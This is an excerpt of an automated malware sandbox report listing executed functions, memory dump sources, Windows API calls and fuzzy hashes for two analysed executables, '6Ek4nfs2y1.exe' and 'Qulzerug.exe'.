Instruction Fuzzy Hash: B8311E71D097948BD769CF2A8C5438ABFF6AF85200F04C0EBD44CAA266DB740A85CF11

Function 084C0040 Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1317550003.00000000084C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 084C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_84c0000_6Ek4nfs2y1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 37804a70b79628d4450ea9368107c35bb62d47f1f5e08ea7642d8ce3538d5a32
Instruction ID: 79982edbd7d00baf16b9171cbbcf4e6272fc268b164f1efc8306d07f86c59232
Opcode Fuzzy Hash: 37804a70b79628d4450ea9368107c35bb62d47f1f5e08ea7642d8ce3538d5a32
Instruction Fuzzy Hash: 8E219B71D05618CBDB6CCF5B994439AFAF7AFC8211F04C0FAD50CA6254EB741A868F51

Analysis Process: 6Ek4nfs2y1.exePID: 7912, Parent PID: 7364COMMON

Execution Graph

Execution Coverage:	14.1%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	3.1%
Total number of Nodes:	127
Total number of Limit Nodes:	11

Executed Functions

Function 0158DD60 Relevance: 5.4, APIs: 1, Strings: 1, Instructions: 1879libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0158E647

Strings

Y, xrefs: 0158FCF4

Memory Dump Source

Source File: 00000008.00000002.2504732819.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1580000_6Ek4nfs2y1.jbxd

Similarity

API ID: InitializeThunk
String ID: Y
API String ID: 2994545307-3233089245
Opcode ID: 0b619f981c82cd48a3d98b1c914d62b9038ff813a6a04b0d1837857d939afd06
Instruction ID: 3ce19cd72fffba2ec682b517580ed24d37fc865a2780e67b82cb0d3a36c970db
Opcode Fuzzy Hash: 0b619f981c82cd48a3d98b1c914d62b9038ff813a6a04b0d1837857d939afd06
Instruction Fuzzy Hash: 36132B70D106198ECB25EF68C884AADF7B1FF99300F51C69AD558BB251EB70AAC5CF40

Function 06AED258 Relevance: 2.5, APIs: 1, Instructions: 978
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 06AED2D9

Memory Dump Source

Source File: 00000008.00000002.2525234523.0000000006AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6ae0000_6Ek4nfs2y1.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9a510455882af905bf71b440f69a6e2e30ee231ee4c784fc4b54f54a7bf4135b
Instruction ID: 13907c56faf82f8012a68d6ab96161a7382553802d311376048781c6a356b693
Opcode Fuzzy Hash: 9a510455882af905bf71b440f69a6e2e30ee231ee4c784fc4b54f54a7bf4135b
Instruction Fuzzy Hash: 4B821B70B402149FDBA4EB79D858BAE7BF2BF89300F6084A9D419EB394DE719C41CB51

Function 06AED24A Relevance: 2.3, APIs: 1, Instructions: 767
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 06AED2D9

Memory Dump Source

Source File: 00000008.00000002.2525234523.0000000006AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6ae0000_6Ek4nfs2y1.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ee78405359f3e327f78a27edf64e2a3f129934a9abf776c5c8730ab9588895a4
Instruction ID: 168036f56b8e400638a74a1bb1a525b2138c11fdfb96a30104ed8ee5770633f6
Opcode Fuzzy Hash: ee78405359f3e327f78a27edf64e2a3f129934a9abf776c5c8730ab9588895a4
Instruction Fuzzy Hash: 2F620B70A402148FDBA4EB79C854BAEBBF2BF89300F2184A9D419EB395DB719C41CF51

Function 06B7DCB0 Relevance: 1.9, APIs: 1, Instructions: 446
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 06B7DCCF

Memory Dump Source

Source File: 00000008.00000002.2525928017.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6b70000_6Ek4nfs2y1.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 47021ce2a2a07f45c420a9289d34a4d5d4166ebd9d89bef2296a8dc38ba3e1fa
Instruction ID: 4111c4c855f3dc52ea273106f92c99417a166222d9ea57d9250fc75730c89f2f
Opcode Fuzzy Hash: 47021ce2a2a07f45c420a9289d34a4d5d4166ebd9d89bef2296a8dc38ba3e1fa
Instruction Fuzzy Hash: B9024270E002199FDB54DFA8C844B9DBBF2BF88300F6585A9D425AB395DB74EC46CB90

Function 0158A7F0 Relevance: 1.6, APIs: 1, Instructions: 130
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000008.00000002.2504732819.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1580000_6Ek4nfs2y1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 257b7d887660c6786458bb92d7de221e41baa54b4042686dacb5fcac9f050e6f
Instruction ID: 47649c77feec02f4efa813b814721eca7350482a9139374f1c06fcf53489dc39
Opcode Fuzzy Hash: 257b7d887660c6786458bb92d7de221e41baa54b4042686dacb5fcac9f050e6f
Instruction Fuzzy Hash: 0941E272D143598FDB14DF69D8043EEBBF5BF89210F14856AD508AB341DB789841CBE1

Function 06B7DCA0 Relevance: 1.6, APIs: 1, Instructions: 89
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 06B7DCCF

Memory Dump Source

Source File: 00000008.00000002.2525928017.0000000006B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6b70000_6Ek4nfs2y1.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3a32f9afee6fc4e05a2d39a4c705e809ee202d522786f4d803610497bbb0ab63
Instruction ID: bcd2bd2a2edfc6dedfae635cdf14f2fefaae64a1c7c3a5dd2870738546a92083
Opcode Fuzzy Hash: 3a32f9afee6fc4e05a2d39a4c705e809ee202d522786f4d803610497bbb0ab63
Instruction Fuzzy Hash: 31315AB0E012198FDB24DFA8C54479DBBB2FF89314F2085A9D425AB381DB75AC46CB94

Function 06AE0040 Relevance: 1.6, APIs: 1, Instructions: 84
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 06AE005F

Memory Dump Source

Source File: 00000008.00000002.2525234523.0000000006AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6ae0000_6Ek4nfs2y1.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4eae880d642411a819285eea2c50a828b163e401289ac814fe8215ee00a37b92
Instruction ID: 4ba0eb0d0f400b984218c0087ae1d0b7e3a252d9ac1531c7533f0a89adf3ab70
Opcode Fuzzy Hash: 4eae880d642411a819285eea2c50a828b163e401289ac814fe8215ee00a37b92
Instruction Fuzzy Hash: 6F316574A00209AFDB44DF99D5C0ADEFBB2FF84304F65C258E4046B289C775AA95CBA0

Function 0158A880 Relevance: 1.6, APIs: 1, Instructions: 76
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,0158A842), ref: 0158A92F

Memory Dump Source

Source File: 00000008.00000002.2504732819.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1580000_6Ek4nfs2y1.jbxd

Similarity

API ID: GlobalMemoryStatus
String ID:
API String ID: 1890195054-0
Opcode ID: 338ce813b260adb39f24b416c4c11e39be0133e27ff7713d3eef89d3057bf458
Instruction ID: e0273e43d5f31749d477a669123f6735a662f877671702d93df9e638a35a72c6
Opcode Fuzzy Hash: 338ce813b260adb39f24b416c4c11e39be0133e27ff7713d3eef89d3057bf458
Instruction Fuzzy Hash: 8821BDB2D042598FDB10DFA9D4043DDFBB0FF49220F18856AC858BB242D37899468FA5

Function 06AE0006 Relevance: 1.6, APIs: 1, Instructions: 66
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 06AE005F

Memory Dump Source

Source File: 00000008.00000002.2525234523.0000000006AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6ae0000_6Ek4nfs2y1.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 5e92b70c9fb8fd386e32643afe73eaab6ff20205b1505b19197dde68e99d58be
Instruction ID: b3b9ff94aae98595fc755307f211a1bd7f50141c048dcb9ccbed72ab5b81efb4
Opcode Fuzzy Hash: 5e92b70c9fb8fd386e32643afe73eaab6ff20205b1505b19197dde68e99d58be
Instruction Fuzzy Hash: 5021E4319463849FC746DBA4D8946CDBFB6EF46324F19459AE040AB293C3785C89CBA1

Function 0158A8C0 Relevance: 1.6, APIs: 1, Instructions: 55
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,0158A842), ref: 0158A92F

Memory Dump Source

Source File: 00000008.00000002.2504732819.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1580000_6Ek4nfs2y1.jbxd

Similarity

API ID: GlobalMemoryStatus
String ID:
API String ID: 1890195054-0
Opcode ID: 406823a8c3609905eda9b800263e7be62ee4c60df93ddde9fb7926d401835184
Instruction ID: 436ac4a39e5bad7c20a188968d92231c55d350f94a28d2d9be442946bd2ce98e
Opcode Fuzzy Hash: 406823a8c3609905eda9b800263e7be62ee4c60df93ddde9fb7926d401835184
Instruction Fuzzy Hash: AB1144B1C046599FDB20DFAAC544BDEFBF4BF09320F15812AD918A7241D378A940CFA5

Function 01589DBC Relevance: 1.6, APIs: 1, Instructions: 55
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,0158A842), ref: 0158A92F

Memory Dump Source

Source File: 00000008.00000002.2504732819.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1580000_6Ek4nfs2y1.jbxd

Similarity

API ID: GlobalMemoryStatus
String ID:
API String ID: 1890195054-0
Opcode ID: a4608b6d2da9692fd26bb433ae3bcca185ed338a50c9c9b1695a72ebebe52f44
Instruction ID: 0a6461ca70933d083530105afb9cd4262d823a09ed545bc59ccbcb05b8ea65d2
Opcode Fuzzy Hash: a4608b6d2da9692fd26bb433ae3bcca185ed338a50c9c9b1695a72ebebe52f44
Instruction Fuzzy Hash: A21122B1C046599BDB10DF9AC4447EEFBF4EB08220F14852AD918B7240D378A950CFA1

Function 0158A5D8 Relevance: 1.6, APIs: 1, Instructions: 51
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemMetrics.USER32(00000043), ref: 0158A654

Memory Dump Source

Source File: 00000008.00000002.2504732819.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1580000_6Ek4nfs2y1.jbxd

Similarity

API ID: MetricsSystem
String ID:
API String ID: 4116985748-0
Opcode ID: 3dfbf65f567dab798bce2652bf64bc635807ca13042e80d7391c7765fca9ed9e
Instruction ID: 6f2d1cf298cd64e617a65ef387a5ee4d61419035fc78bccb0352ac852e79e252
Opcode Fuzzy Hash: 3dfbf65f567dab798bce2652bf64bc635807ca13042e80d7391c7765fca9ed9e
Instruction Fuzzy Hash: CE1149B5C043488FDB14AF9AD4497DEBBF4EB48314F20882AD55AA7240D7746644CFA5

Function 0158A5E8 Relevance: 1.5, APIs: 1, Instructions: 45
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemMetrics.USER32(00000043), ref: 0158A654

Memory Dump Source

Source File: 00000008.00000002.2504732819.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1580000_6Ek4nfs2y1.jbxd

Similarity

API ID: MetricsSystem
String ID:
API String ID: 4116985748-0
Opcode ID: fa4b9ca1d8f82dc45649eb36878eb0a87e54fc9ca6a7c77f75243bd1109631ac
Instruction ID: 75c44ece41e4696d05a7570cf5362152e2d8915e02c7df96eef3e3aab5646198
Opcode Fuzzy Hash: fa4b9ca1d8f82dc45649eb36878eb0a87e54fc9ca6a7c77f75243bd1109631ac
Instruction Fuzzy Hash: 70113AB5C043088FDB14AF9AD4497DEBBF4EB48314F10882AD559A7240D7756544CFA5

Function 012ED638 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2498057240.00000000012ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 012ED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_12ed000_6Ek4nfs2y1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5cf2839dcf411ed1fe060b95dc7c4015d3389135589df5301349919763518962
Instruction ID: 3fc707f7a464bfb52225f35057d1c8351872393482bad07193dfa0f137635bb2
Opcode Fuzzy Hash: 5cf2839dcf411ed1fe060b95dc7c4015d3389135589df5301349919763518962
Instruction Fuzzy Hash: 57217576114208DFDB05DF54E9C8F26BBA1FB88310F64C56CEA090B246C336D446CEA2

Function 012FD01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2498366472.00000000012FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012FD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_12fd000_6Ek4nfs2y1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9674a4adcefeee76e7dd238d52ae4578157d4d5164d0ef0c36b31445fb95917e
Instruction ID: 9a0a4f3eb4f19622e58a48d47c5ca107e7f12717f4e45779616584e0183ad563
Opcode Fuzzy Hash: 9674a4adcefeee76e7dd238d52ae4578157d4d5164d0ef0c36b31445fb95917e
Instruction Fuzzy Hash: FA212275614308DFDB15DF64D980B26FBA1EB84314F24C57DEA0A4B246C37BD847CA62

Function 012FD006 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2498366472.00000000012FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012FD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_12fd000_6Ek4nfs2y1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40d8998bc6c543b16e0b79c58a0dde9d01801ec195fca39c15b09d1936e5ed2f
Instruction ID: a60c242899a3d27fe27d7d9e0250b1253cc942791d94973c0ffb31f076e6c50d
Opcode Fuzzy Hash: 40d8998bc6c543b16e0b79c58a0dde9d01801ec195fca39c15b09d1936e5ed2f
Instruction Fuzzy Hash: C12179755093848FDB13CF24D990B15BF71EB46314F28C5EED9498B6A7C33A980ACB62

Function 012ED633 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2498057240.00000000012ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 012ED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_12ed000_6Ek4nfs2y1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c2c4bb083ffa01750429338de36c7bd8c3c5b68e8b11f755f55576fea2132e6f
Instruction ID: 7b96b7fdb4dcb78b6eb13f9d7fc79009aae876109255a6bf3130cd19fbce0129
Opcode Fuzzy Hash: c2c4bb083ffa01750429338de36c7bd8c3c5b68e8b11f755f55576fea2132e6f
Instruction Fuzzy Hash: 4F11E176404284CFCB16CF54D5C4B16BFB1FB84314F2482A9D9090B657C33AD456CFA1

Analysis Process: Qulzerug.exePID: 8060, Parent PID: 3968COMMON

Execution Graph

Execution Coverage:	2.7%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	3
Total number of Limit Nodes:	0

Executed Functions

Function 0863DA70 Relevance: .3, Instructions: 276
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000009.00000002.1569691696.0000000008620000.00000040.00000800.00020000.00000000.sdmp, Offset: 08620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_8620000_Qulzerug.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 60ef6ee83103e28cdac69887330240c58e74bbac71640c2c4ad99a080f1ea986
Instruction ID: d7f26c042312e0ce5dd92de6eb5feb39a87b5177cb714a952e95ada4154f7778
Opcode Fuzzy Hash: 60ef6ee83103e28cdac69887330240c58e74bbac71640c2c4ad99a080f1ea986
Instruction Fuzzy Hash: A3D19174A01218CFDB64DFA9D994B9DBBB2FF89300F1081A9D409AB365DB31A981CF50

Function 0863EF18 Relevance: 1.6, Strings: 1, Instructions: 339
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

d, xrefs: 0863F179

Memory Dump Source

Source File: 00000009.00000002.1569691696.0000000008620000.00000040.00000800.00020000.00000000.sdmp, Offset: 08620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_8620000_Qulzerug.jbxd

Similarity

API ID:
String ID: d
API String ID: 0-2564639436
Opcode ID: 23a9b3dc38789d440fdb2756f596d5bcf6e8141b87b755ddac64c244378ab171
Instruction ID: b52f253bf97924fcb566899ab2658ce707628fea1aeaad47f5c75c9c6299dca0
Opcode Fuzzy Hash: 23a9b3dc38789d440fdb2756f596d5bcf6e8141b87b755ddac64c244378ab171
Instruction Fuzzy Hash: B6D18D34A00612CFCB14DF29D484A6AB7F2FF88311B66C95DE45A9B761DB71F842CB90

Function 0293FEB8 Relevance: 1.6, APIs: 1, Instructions: 56
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 0293FF2C

Memory Dump Source

Source File: 00000009.00000002.1505149371.0000000002930000.00000040.00000800.00020000.00000000.sdmp, Offset: 02930000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2930000_Qulzerug.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 06373803d71328ce0f68e065e960eb1273cccc28969323f537f66acef33f815f
Instruction ID: 34b8da70280aad732dcbc1a7be3739837ed19ecacab5cf0ca0bb73338bd38354
Opcode Fuzzy Hash: 06373803d71328ce0f68e065e960eb1273cccc28969323f537f66acef33f815f
Instruction Fuzzy Hash: 9F11E575D043099FDB20DFAAC844B9EFBF5EF48320F14842AD459A7250C7759945CFA0

Function 0863F460 Relevance: .5, Instructions: 479
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000009.00000002.1569691696.0000000008620000.00000040.00000800.00020000.00000000.sdmp, Offset: 08620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_8620000_Qulzerug.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fa830794915a3a57087100f93644d576ebfcf17c13c3a29dee45320fd11a47fd
Instruction ID: f1a6ecaa1947b3775a083c624d38de323af03ac1c43f05003b1da30dbaea384d
Opcode Fuzzy Hash: fa830794915a3a57087100f93644d576ebfcf17c13c3a29dee45320fd11a47fd
Instruction Fuzzy Hash: 67129C71A00215EFDB25EFA8C440AAEB7F2FF88311F10856DE4469B794DB35AD46CB90

Function 0113D030 Relevance: .1, Instructions: 74
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000009.00000002.1504177014.000000000113D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0113D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_113d000_Qulzerug.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 91398678d5817a857f37f52ed84d31bb52fd2410dbf03ca5a3fe8b4db27a1c92
Instruction ID: 214c9cd36dbea7fefba1f9799880d110957cd52f613bd9c9f2e78f176a52ab5c
Opcode Fuzzy Hash: 91398678d5817a857f37f52ed84d31bb52fd2410dbf03ca5a3fe8b4db27a1c92
Instruction Fuzzy Hash: AA2125B1504244DFDF19DF54E9C0B2AFB65FBC4714F64C169E9090B24AC336D816CBA2

Function 0863F330 Relevance: .1, Instructions: 69
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000009.00000002.1569691696.0000000008620000.00000040.00000800.00020000.00000000.sdmp, Offset: 08620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_8620000_Qulzerug.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 98b21e0c2f37651609cf7e89ba4a3a18a194e37c06f6808430ef1889c5d99d42
Instruction ID: ee46149f1a0a8ce8564d1442a2969e393cd1a8f19bb195993299ed67a8b5551a
Opcode Fuzzy Hash: 98b21e0c2f37651609cf7e89ba4a3a18a194e37c06f6808430ef1889c5d99d42
Instruction Fuzzy Hash: 8121D571A00219CFDB04DF98C581ADDB7F2EF89305F2141A9E405BB2A1DB76AD45CBA0

Function 0113D02B Relevance: .1, Instructions: 55
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000009.00000002.1504177014.000000000113D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0113D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_113d000_Qulzerug.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 633f671973706fbafc265e8a78a39be7cd23416c3fb565de0cfc706c6b37537b
Instruction ID: 9ee67584166b29a6479b29fdec7276d52811dbdb481ad2c9414b22e25195fe58
Opcode Fuzzy Hash: 633f671973706fbafc265e8a78a39be7cd23416c3fb565de0cfc706c6b37537b
Instruction Fuzzy Hash: D611B176504280CFDB16CF54E9C0B16FF71FB84714F24C1AAD8490B65AC33AD41ACBA2

Function 0863DEF8 Relevance: .0, Instructions: 46
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000009.00000002.1569691696.0000000008620000.00000040.00000800.00020000.00000000.sdmp, Offset: 08620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_8620000_Qulzerug.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c97151b9c9c742e7868b6d898e4e171fc09ec5d1d10b333c8cfd1febc4cf4290
Instruction ID: 9373cc6dd166a43062c345453c7a66ff272a94ddbf48d7eb29c9bf83f5f7e815
Opcode Fuzzy Hash: c97151b9c9c742e7868b6d898e4e171fc09ec5d1d10b333c8cfd1febc4cf4290
Instruction Fuzzy Hash: 0811B3B4E0021A9FDB44DFA9C9557AEBBF1BF88200F20856AD418B7354EA749A418B91

Function 0101D76D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1503961567.000000000101D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0101D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_101d000_Qulzerug.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 82676697b54f79f09f2ef026ee93a693a7da37a1c63e60793b4116e5360fc6b7
Instruction ID: a918607d95de888abbefd158d2ca410fc0cee9ab426ea3d4a3e5591206d2de8d
Opcode Fuzzy Hash: 82676697b54f79f09f2ef026ee93a693a7da37a1c63e60793b4116e5360fc6b7
Instruction Fuzzy Hash: 7201A7714057849BE7104F99DD88766FBD8FF41234F18C45AED890B28AD67D9840CB72

Function 0101D76C Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1503961567.000000000101D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0101D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_101d000_Qulzerug.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c46986072a0493acc8452b0830261f2f20a9849f383003242128f86bdd62e492
Instruction ID: d3846a1e053dd7fdd050058fcb4d8381873b823215f49cd0cc08f47450afb556
Opcode Fuzzy Hash: c46986072a0493acc8452b0830261f2f20a9849f383003242128f86bdd62e492
Instruction Fuzzy Hash: 7AF0AF71405384AEE7208A09DC88B62FFD8EF41634F18C45AED880B686C2789844CB61

Function 0862915F Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1569691696.0000000008620000.00000040.00000800.00020000.00000000.sdmp, Offset: 08620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_8620000_Qulzerug.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3cd204addd6bc11381d817a8d23c50a0800ae6c36ed383f347d276c12c0b610
Instruction ID: e8d68a9a3ae28aa15359bb81200416a82ab3552a63a4806c95c6baabee5d7c3d
Opcode Fuzzy Hash: a3cd204addd6bc11381d817a8d23c50a0800ae6c36ed383f347d276c12c0b610
Instruction Fuzzy Hash: EF013174A45518CFDB29DF58CD48B9AB3B5FB48301F0050D6E909A7758DB386E428F11

Function 08621374 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1569691696.0000000008620000.00000040.00000800.00020000.00000000.sdmp, Offset: 08620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_8620000_Qulzerug.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c4dd85a779bba9306c8f4aa75c404676c3161a12d35578e36f79448ee882bea
Instruction ID: be79494eb9d621247a0da323c3759eedb98b408f5fd3e428532e88a5462afa78
Opcode Fuzzy Hash: 2c4dd85a779bba9306c8f4aa75c404676c3161a12d35578e36f79448ee882bea
Instruction Fuzzy Hash: B401DA74A042298FCB65DF64D985A99B7F9FB48710F1050E9D40DAB348DB386F85CF01

Function 0863E2A8 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1569691696.0000000008620000.00000040.00000800.00020000.00000000.sdmp, Offset: 08620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_8620000_Qulzerug.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 86b38ca98b07895bc8d1ff2ed0b310dc10b2122107b4e5f2ddcc2a6eb72dfd39
Instruction ID: 099211db09366ef8a4d21f6d9c162d76bfb92b366bc2407545cdebd29234a93b
Opcode Fuzzy Hash: 86b38ca98b07895bc8d1ff2ed0b310dc10b2122107b4e5f2ddcc2a6eb72dfd39
Instruction Fuzzy Hash: BEF01CB4E04248EFCB94DFA8D841AADBBF8AB49211F14C0AAE858E3341D6359A51DF50

Function 08639418 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1569691696.0000000008620000.00000040.00000800.00020000.00000000.sdmp, Offset: 08620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_8620000_Qulzerug.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ffc0501e87f9c99941efeddd1dffd823b6e64f5c2131768738bbeb217e95c29
Instruction ID: 4219d6a715d41c8e7c36b6a4c5cc76b40f9e33d4fe897bf2e39ad2c4871abe63
Opcode Fuzzy Hash: 3ffc0501e87f9c99941efeddd1dffd823b6e64f5c2131768738bbeb217e95c29
Instruction Fuzzy Hash: FDE0ED74D04208EFCB94DFA8D94069CFBF4EB49311F10C0AAD858A3341D7759A51DF41

Function 0863C560 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1569691696.0000000008620000.00000040.00000800.00020000.00000000.sdmp, Offset: 08620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_8620000_Qulzerug.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3ffc0501e87f9c99941efeddd1dffd823b6e64f5c2131768738bbeb217e95c29
Instruction ID: ff44ea3f3f6d119e7f633ea854522d5f1b6817b8b958c00066b157a6cfd46dba
Opcode Fuzzy Hash: 3ffc0501e87f9c99941efeddd1dffd823b6e64f5c2131768738bbeb217e95c29
Instruction Fuzzy Hash: 44E0ED74E04208EFCB94DFA8D940A9CFBF4EB58310F10C1AAD818A3341D635AA51DF41

Function 08621159 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

